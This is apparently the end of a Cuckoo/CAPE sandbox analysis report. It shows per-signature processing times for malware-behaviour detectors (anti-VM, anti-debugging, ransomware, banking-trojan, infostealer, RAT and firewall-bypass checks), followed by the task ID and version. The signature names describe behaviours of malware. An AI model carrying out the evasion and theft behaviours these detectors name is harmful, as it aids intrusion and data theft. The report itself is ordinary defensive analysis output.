  • 0.005 antiemu_wine_func
  • 0.005 betabot_behavior
  • 0.005 antidbg_windows
  • 0.005 dynamic_function_loading
  • 0.005 antivm_generic_diskreg
  • 0.005 geodo_banking_trojan
  • 0.004 malicious_dynamic_function_loading
  • 0.004 stack_pivot
  • 0.004 ipc_namedpipe
  • 0.004 kovter_behavior
  • 0.004 antivm_vpc_keys
  • 0.004 infostealer_bitcoin
  • 0.003 antivm_vbox_libs
  • 0.003 rat_luminosity
  • 0.003 exploit_getbasekerneladdress
  • 0.003 persistence_autorun
  • 0.003 ransomware_extensions
  • 0.003 recon_fingerprint
  • 0.002 stack_pivot_file_created
  • 0.002 exploit_gethaldispatchtable
  • 0.002 shifu_behavior
  • 0.002 ransomware_message
  • 0.002 antianalysis_detectfile
  • 0.002 antivm_xen_keys
  • 0.002 antivm_hyperv_keys
  • 0.002 antivm_vbox_files
  • 0.002 modify_proxy
  • 0.002 browser_security
  • 0.002 bypass_firewall
  • 0.002 packer_armadillo_regkey
  • 0.002 remcos_regkeys
  • 0.001 tinba_behavior
  • 0.001 rat_nanocore
  • 0.001 antiav_avast_libs
  • 0.001 office_flash_load
  • 0.001 dridex_behavior
  • 0.001 injection_explorer
  • 0.001 antisandbox_sunbelt_libs
  • 0.001 antisandbox_sboxie_libs
  • 0.001 exec_crash
  • 0.001 InjectionSetWindowLong
  • 0.001 vawtrak_behavior
  • 0.001 cerber_behavior
  • 0.001 antiav_bitdefender_libs
  • 0.001 antidbg_devices
  • 0.001 antivm_generic_bios
  • 0.001 antivm_generic_cpu
  • 0.001 antivm_generic_system
  • 0.001 disables_browser_warn
  • 0.001 network_torgateway

Reporting ( 0.334 seconds )

  • 0.334 CompressResults
Task ID 90416
Mongo ID 5d78fa82eac9b186706342e4
Cuckoo release 1.3-CAPE
Delete